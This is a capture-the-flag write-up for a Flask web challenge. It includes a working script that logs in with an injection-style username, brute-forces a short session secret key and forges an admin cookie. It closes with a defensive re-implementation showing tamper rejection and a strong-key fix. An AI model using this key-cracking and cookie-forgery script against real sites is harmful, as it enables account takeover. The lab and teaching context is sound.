# [EN] THE EYE 2

###### tags: `Writeup` `Web` `English`

> [name=Curious]

## Train Of Thought & Solution

If you search a little, you can find a path called `/robots.txt`. Upon entering it, you will discover two paths that appear to be suspiciously disallowed.

![](https://hackmd.io/_uploads/rJOlNiFIh.png)

If you try to access `/admin` directly, you will be redirected to the main page. However, if you visit `/admin-dev`, you will find some Flask code related to `/admin`.

![](https://hackmd.io/_uploads/ryBHEiFL3.png)

By examining how the `session` cookie is generated, the process can be described as follows:

```python=
import hashlib, hmac
from itsdangerous import base64_encode

# Flask session cookie layout: <base64 payload>.<base64 timestamp>.<base64 HMAC>
session_data = base64_encode(b'{"username":"curious"}')
session_time = base64_encode(b'<time stamp in bytes>')
pre_session = session_data + b'.' + session_time

# `secret_key` here is `app.secret_key` (the unknown we need to recover).
# Flask derives the signing key as HMAC-SHA1(secret_key, salt='cookie-session')
key = hmac.new(secret_key, msg=b'cookie-session', digestmod=hashlib.sha1).digest()
session_hmac = base64_encode(hmac.new(key, msg=pre_session, digestmod=hashlib.sha1).digest())

session = pre_session + b'.' + session_hmac
```

Since we have the `session` cookie for the user named curious, we can attempt different `app.secret_key` values to calculate curious's `session_hmac`. If the calculated `session_hmac` matches the original session's `session_hmac`, it means we have found the `app.secret_key`.

```python=
import requests as req
from itertools import product
from itsdangerous import base64_decode, base64_encode
from tqdm import tqdm
import hashlib, hmac


def gen_session_hmac(pre_session: bytes, secret_key: bytes) -> bytes:
    # Same derivation Flask uses: key = HMAC-SHA1(secret_key, 'cookie-session'),
    # then the cookie body is signed with HMAC-SHA1 under that derived key.
    key = hmac.new(secret_key, msg=b'cookie-session', digestmod=hashlib.sha1).digest()
    return hmac.new(key, msg=pre_session, digestmod=hashlib.sha1).digest()


# Log in as curious and split the returned cookie into its three dot-separated parts.
session = req.post(
    'http://lotuxctf.com:20002/login',
    data={'username': "curious' -- ", 'password': '123'},
    allow_redirects=False,
).headers['Set-Cookie'].split(';')[0].split('=')[1].encode().split(b'.')

pre_session = session[0] + b'.' + session[1]
right_hmac = base64_decode(session[2])

# Try every 3-byte secret key until the recomputed HMAC matches the real one.
for new_key in tqdm(product(range(256), repeat=3)):
    new_key = bytes(new_key)
    if gen_session_hmac(pre_session, new_key) == right_hmac:
        secret_key = new_key
        break

# Re-sign a payload for the admin user, reusing the original timestamp.
new_pre_session = base64_encode(b'{"username":"admin"}') + b'.' + session[1]
session = new_pre_session + b'.' + base64_encode(gen_session_hmac(new_pre_session, secret_key))
print(session)
```

Next, using the discovered `app.secret_key`, calculate a `session` cookie whose `session_data` is `base64_encode(b'{"username":"admin"}')`. Replace the existing `session` cookie in the browser with this generated `session` cookie. Then, make a request to `/admin`.

![](https://hackmd.io/_uploads/B1JYFoYLh.png)

Click on the `Get Flag!` button, and you will be able to obtain the flag.
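The cookie scheme the writeup describes, re-implemented here with only the standard library as an added example (this is not the writeup's code and not Flask's or itsdangerous's own implementation). It shows the three-part layout, the `cookie-session` key derivation, a verifier with a constant-time comparison that rejects a payload swapped for `{"username":"admin"}`, and why the challenge's key was recoverable: `keyspace()` counts the candidates for a key of a given length, and a key from `secrets.token_bytes(32)` puts that count far beyond any enumeration. Function names, the sample payload and the fixed timestamp are constructed for this example.

```python
import base64
import hashlib
import hmac
import secrets

# Flask's default salt for the session signer (as named in the writeup above).
SALT = b'cookie-session'


def b64(data: bytes) -> bytes:
    """URL-safe base64 without '=' padding, the encoding itsdangerous uses."""
    return base64.urlsafe_b64encode(data).rstrip(b'=')


def b64_decode(data: bytes) -> bytes:
    """Inverse of b64(): restore the stripped padding before decoding."""
    return base64.urlsafe_b64decode(data + b'=' * (-len(data) % 4))


def derive_key(secret_key: bytes) -> bytes:
    """Key derivation 'hmac': HMAC-SHA1(secret_key, salt)."""
    return hmac.new(secret_key, msg=SALT, digestmod=hashlib.sha1).digest()


def sign_session(payload: bytes, secret_key: bytes, timestamp: int) -> bytes:
    """Build <b64 payload>.<b64 timestamp>.<b64 HMAC-SHA1> for the given key."""
    ts_bytes = timestamp.to_bytes(max(1, (timestamp.bit_length() + 7) // 8), 'big')
    pre = b64(payload) + b'.' + b64(ts_bytes)
    mac = hmac.new(derive_key(secret_key), msg=pre, digestmod=hashlib.sha1).digest()
    return pre + b'.' + b64(mac)


def verify_session(cookie: bytes, secret_key: bytes):
    """Return the payload if the signature checks out, otherwise None.

    The comparison is constant-time (hmac.compare_digest), so a forged
    cookie leaks nothing about how many signature bytes were right.
    """
    parts = cookie.split(b'.')
    if len(parts) != 3:
        return None
    data, ts, sig = parts
    pre = data + b'.' + ts
    expected = hmac.new(derive_key(secret_key), msg=pre, digestmod=hashlib.sha1).digest()
    if not hmac.compare_digest(expected, b64_decode(sig)):
        return None
    return b64_decode(data)


def keyspace(key_length_bytes: int) -> int:
    """Number of candidate secrets for a key of this length (256 ** n)."""
    return 256 ** key_length_bytes


def tampered_payload_rejected(secret_key: bytes, timestamp: int = 1700000000) -> bool:
    """Sign a cookie for 'curious', swap in an 'admin' payload, keep the old
    signature, and confirm the verifier refuses it."""
    good = sign_session(b'{"username":"curious"}', secret_key, timestamp)
    _, ts, sig = good.split(b'.')
    forged = b64(b'{"username":"admin"}') + b'.' + ts + b'.' + sig
    return verify_session(forged, secret_key) is None


if __name__ == '__main__':
    weak_key = b'\x01\x02\x03'            # constructed: a 3-byte key like the challenge's
    strong_key = secrets.token_bytes(32)  # what app.secret_key should look like
    print('3-byte keyspace :', keyspace(len(weak_key)))
    print('32-byte keyspace:', keyspace(len(strong_key)))
    cookie = sign_session(b'{"username":"curious"}', strong_key, 1700000000)
    print('round trip      :', verify_session(cookie, strong_key))
    print('forgery rejected:', tampered_payload_rejected(strong_key))
```

A 3-byte key gives 16,777,216 candidates, which is why a single captured cookie plus an offline loop was enough to recover it; with a 32-byte random key the same attack has 2^256 candidates, so the fix is simply to generate `app.secret_key` with `secrets.token_bytes(32)` (or equivalent) rather than a short literal.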